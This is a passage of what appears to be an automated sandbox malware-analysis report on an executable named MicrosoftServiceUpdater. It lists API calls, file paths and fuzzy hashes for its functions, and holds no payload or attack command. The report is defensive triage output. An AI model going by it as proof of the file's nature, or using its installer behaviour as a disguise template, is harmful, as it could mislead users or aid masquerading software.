                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$Free$FindLoadLock
                                                                                                                                                                                          • String ID: UPDFILE%lu
                                                                                                                                                                                          • API String ID: 3629466761-2329316264
                                                                                                                                                                                          • Opcode ID: 912f736fff6cc648edac57934596fe713f99585f0c6d65f4e9552fedd6e4e983
                                                                                                                                                                                          • Instruction ID: a810e5e94337de9f429f498a41e64a40c76faee89be0189285813fcb79bc01d6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 912f736fff6cc648edac57934596fe713f99585f0c6d65f4e9552fedd6e4e983
                                                                                                                                                                                          • Instruction Fuzzy Hash: 23317132A18A4186F7118B25A804AB9FBA0FF89B50F55A235DA5E833D4CFBFE504D640
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3370778649-0
                                                                                                                                                                                          • Opcode ID: 2722992ef715b720f40bc041322e554c29a54f2f23c26d5441508fe68943f667
                                                                                                                                                                                          • Instruction ID: c769d4fead2a334d5f5fc206b43efdbcb159b552f7ac591e573df5890cf00a0b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2722992ef715b720f40bc041322e554c29a54f2f23c26d5441508fe68943f667
                                                                                                                                                                                          • Instruction Fuzzy Hash: D2115931B09B8187FB155B62A804579FBA0EB4EFD1F48A039DE0E83788CE7ED4409700
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                          • String ID: wininit.ini
                                                                                                                                                                                          • API String ID: 3273605193-4206010578
                                                                                                                                                                                          • Opcode ID: 272abce5711e61987618d7fa9275a95ad876e249e85b0132ec51f4cc75ec81ca
                                                                                                                                                                                          • Instruction ID: 2f2d32ae235961d2aa974864c1b465b1ffbfc90bfe9ece96a91df5a04a58b0a7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 272abce5711e61987618d7fa9275a95ad876e249e85b0132ec51f4cc75ec81ca
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F117F32618A8587F7218B25E4546BAB7A1FBCD704F859231CA4E833A4CF7ED549CA00
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Text$DesktopDialogForegroundItem
                                                                                                                                                                                          • String ID: one
                                                                                                                                                                                          • API String ID: 761066910-2053932785
                                                                                                                                                                                          • Opcode ID: f21d8755046b2bff5672eb5e92626a0ccf9070bb66767417a7c329f8521aba4d
                                                                                                                                                                                          • Instruction ID: 3f130b00c78420246ff202a4a7a5d9586257f67134033b8ee319cfdbf1d3abd3
                                                                                                                                                                                          • Opcode Fuzzy Hash: f21d8755046b2bff5672eb5e92626a0ccf9070bb66767417a7c329f8521aba4d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 96113360D4C64286FA165B62A804AB8EA51EF8AB41FD5B170C90E833D4DFBFA444E702
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: FindResourceA.KERNEL32(?,?,00000000,00007FF636342F6B), ref: 00007FF636345220
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: SizeofResource.KERNEL32(?,?,00000000,00007FF636342F6B), ref: 00007FF636345231
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: FindResourceA.KERNEL32(?,?,00000000,00007FF636342F6B), ref: 00007FF636345257
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: LoadResource.KERNEL32(?,?,00000000,00007FF636342F6B), ref: 00007FF636345268
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: LockResource.KERNEL32(?,?,00000000,00007FF636342F6B), ref: 00007FF636345277
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: memcpy_s.MSVCRT ref: 00007FF636345296
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: FreeResource.KERNEL32(?,?,00000000,00007FF636342F6B), ref: 00007FF6363452A5
                                                                                                                                                                                          • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF6363434BA), ref: 00007FF636344A7D
                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,00000000,00007FF6363434BA), ref: 00007FF636344B19
                                                                                                                                                                                            • Part of subcall function 00007FF636344F2C: LoadStringA.USER32 ref: 00007FF636344FBC
                                                                                                                                                                                            • Part of subcall function 00007FF636344F2C: MessageBoxA.USER32 ref: 00007FF636344FFC
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                          • String ID: <None>$@$FINISHMSG
                                                                                                                                                                                          • API String ID: 3507850446-4126004490
                                                                                                                                                                                          • Opcode ID: 1d4e6bd0a63b8b8b494048026c3f832f350be4f10dc00f629820bf4d9c538aed
                                                                                                                                                                                          • Instruction ID: 96f9c8b2fc5e052ce4bab052575d369b20bccdf54c26938b30355a31f2e4bed1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d4e6bd0a63b8b8b494048026c3f832f350be4f10dc00f629820bf4d9c538aed
                                                                                                                                                                                          • Instruction Fuzzy Hash: 40118172A0864287F7219F20E451B7AF790FB89795F44A134DA4D82B85DFBFD0049B04
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4104442557-0
                                                                                                                                                                                          • Opcode ID: dcb9afa00af80bbd2438476da7bde3a9357a0fac88edcf4c174e2726fe409359
                                                                                                                                                                                          • Instruction ID: 61cccc99cc441976f7afb5a6c952ca7eec32f3841a2bf303ea3a8e9cf508473d
                                                                                                                                                                                          • Opcode Fuzzy Hash: dcb9afa00af80bbd2438476da7bde3a9357a0fac88edcf4c174e2726fe409359
                                                                                                                                                                                          • Instruction Fuzzy Hash: 11116022A08F418AFB11DF71EC446A873A4FB49798F401A30EA6D87794EFBED564C340
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                                                                                                                                                          • API String ID: 438848745-3737834073
                                                                                                                                                                                          • Opcode ID: 49ff66dd0027909a7b800612d590b018d10ed512dde88fa856883505687205f1
                                                                                                                                                                                          • Instruction ID: 997829d3a3117bb51091283d413d4024b178e41e199cf899c5aeaf18c517ac95
                                                                                                                                                                                          • Opcode Fuzzy Hash: 49ff66dd0027909a7b800612d590b018d10ed512dde88fa856883505687205f1
                                                                                                                                                                                          • Instruction Fuzzy Hash: B6116031A1868686FE628B24E4447F9B7A0FB89704F852231C68D827D5DF7FD60AD700
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1273765764-0
                                                                                                                                                                                          • Opcode ID: 779d4c80867048ee85b76de8b865dc8d6e9560f81da083dc2e25c0ec5bc041cf
                                                                                                                                                                                          • Instruction ID: c638e56de3493547fe656301f58d66077c9b5b675e4a7e90fb29195f90ba1f55
                                                                                                                                                                                          • Opcode Fuzzy Hash: 779d4c80867048ee85b76de8b865dc8d6e9560f81da083dc2e25c0ec5bc041cf
                                                                                                                                                                                          • Instruction Fuzzy Hash: F411E431A08A8586F6214B21F404BB9FBA0FB8ABA5F446270CA5E833C5CF7FD045DB00
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Message$BeepVersion
                                                                                                                                                                                          • String ID: one
                                                                                                                                                                                          • API String ID: 2519184315-2053932785
                                                                                                                                                                                          • Opcode ID: cd403af55b8476f266db926376131480319a2a35561f0b0250f12cd9deded584
                                                                                                                                                                                          • Instruction ID: aec44f5f11a6e1e8b4276eb926fe634993baa66493c9e6984c2d4b3f5244e964
                                                                                                                                                                                          • Opcode Fuzzy Hash: cd403af55b8476f266db926376131480319a2a35561f0b0250f12cd9deded584
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A91A072A1925286FB629F16A480E79F6A0FF54754F503135DA5EC33D0CEBFE881AB01
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                          • API String ID: 1065093856-884561453
                                                                                                                                                                                          • Opcode ID: e045f108fcc8068e113ee9e0e4cf638292a1811dea5a3a985454c52ef67f7177
                                                                                                                                                                                          • Instruction ID: 72907f0b6090fe71822ac8e4d2fcfe3600ea0366917ce7b59e92e3b1b2b000e3
                                                                                                                                                                                          • Opcode Fuzzy Hash: e045f108fcc8068e113ee9e0e4cf638292a1811dea5a3a985454c52ef67f7177
                                                                                                                                                                                          • Instruction Fuzzy Hash: D331837261C68186FB628F10E444BBAF760FB897A4F445235DA5D87794CFBED408DB00
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: *MEMCAB
                                                                                                                                                                                          • API String ID: 0-3211172518
                                                                                                                                                                                          • Opcode ID: 8f0ecc18e58d69be0ff920eef984cb1b5456fa5790288b24a30beba8d1cf7dc7
                                                                                                                                                                                          • Instruction ID: 1409d2a170954ba4e598d13b374dda5498b1d5c6c3e23cd968ee989218fa8f19
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f0ecc18e58d69be0ff920eef984cb1b5456fa5790288b24a30beba8d1cf7dc7
                                                                                                                                                                                          • Instruction Fuzzy Hash: E5314831A0DB42D5FA028B10E4447B9B3E0BF5A760F906231D96D827A0EFBFE448D700
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00007FF63634232B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseInfoOpenQuery
                                                                                                                                                                                          • String ID: System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                          • API String ID: 2142960691-1430103811
                                                                                                                                                                                          • Opcode ID: ffb65070036c0e638a3fb9cad9fcb0c30fa5a0b7ad628ef0fdab3ccaafb5356a
                                                                                                                                                                                          • Instruction ID: b197be864ca0abc655f0e39b03ef0cdf1464a11c26911ec08a5ef12c5b8c5564
                                                                                                                                                                                          • Opcode Fuzzy Hash: ffb65070036c0e638a3fb9cad9fcb0c30fa5a0b7ad628ef0fdab3ccaafb5356a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A11E932618B8187E7108F65F84452AFBE8F789750B545229EB8983B68DF79D0558F00
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 140117192-0
                                                                                                                                                                                          • Opcode ID: 31029eafa361a8816cb3b7c2e50cea46018a43ad4d194b63bd7ab82f81b508e1
                                                                                                                                                                                          • Instruction ID: 1e01b8770a5a39692e90041868f6414affd931e28efc2a4413ab7073d634bfde
                                                                                                                                                                                          • Opcode Fuzzy Hash: 31029eafa361a8816cb3b7c2e50cea46018a43ad4d194b63bd7ab82f81b508e1
                                                                                                                                                                                          • Instruction Fuzzy Hash: EB41D475A09B0181FB528B58F890765B3A4FB8A784F906136DA8D837A4DFBFE444E700
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_cexit_inittermexit
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 642454821-0
                                                                                                                                                                                          • Opcode ID: 09076979b3e96fc5e14e933eaad3d45af6720b0af7fabc4f9cac535cb861094d
                                                                                                                                                                                          • Instruction ID: fca7a6bfa6516251c532ecaf1eb1ca194094cc07effa7dfbdd1f1930d8f9ed6e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 09076979b3e96fc5e14e933eaad3d45af6720b0af7fabc4f9cac535cb861094d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E315A31A1DA4686F762DB20E850B76A3A0FF453A4F546435DA4DC33A1CFBFE840E600
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 140117192-0
                                                                                                                                                                                          • Opcode ID: 4090816444ccd06f36d04890147d9874dc88da504e5caf5353b8954b97740e78
                                                                                                                                                                                          • Instruction ID: e4e4db8c050c497c36a447ee1a11843290b404eafd17b4d6d380776caa535ca8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4090816444ccd06f36d04890147d9874dc88da504e5caf5353b8954b97740e78
                                                                                                                                                                                          • Instruction Fuzzy Hash: 01310779A09B4181FB128B58F890765F7A4FB89784F906136DA8D837A4DFBFE448D700
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1214682469-0
                                                                                                                                                                                          • Opcode ID: 59effaab94a793ca2fbdf558991555ed1e090edb450195feb7077b6de0fa885d
                                                                                                                                                                                          • Instruction ID: a0c37c83ba3e1426ecd6b1b40e942efc2ad7aad67b63a15b58800f13e7e05bef
                                                                                                                                                                                          • Opcode Fuzzy Hash: 59effaab94a793ca2fbdf558991555ed1e090edb450195feb7077b6de0fa885d
                                                                                                                                                                                          • Instruction Fuzzy Hash: FF115E32A18B4186FA218B11B40467AFBA0FB8AFE1F485634DE5D47BD4DF7ED0409B00
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Char$Prev$Next
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3260447230-0
                                                                                                                                                                                          • Opcode ID: 7302f258e324082df56eb9e906256855f42b6e92faf740384e3aaa5bd17368a5
                                                                                                                                                                                          • Instruction ID: 68da915d28d722b26f0768c5c3053a7e08b40e314f346efc196ea410ddbba790
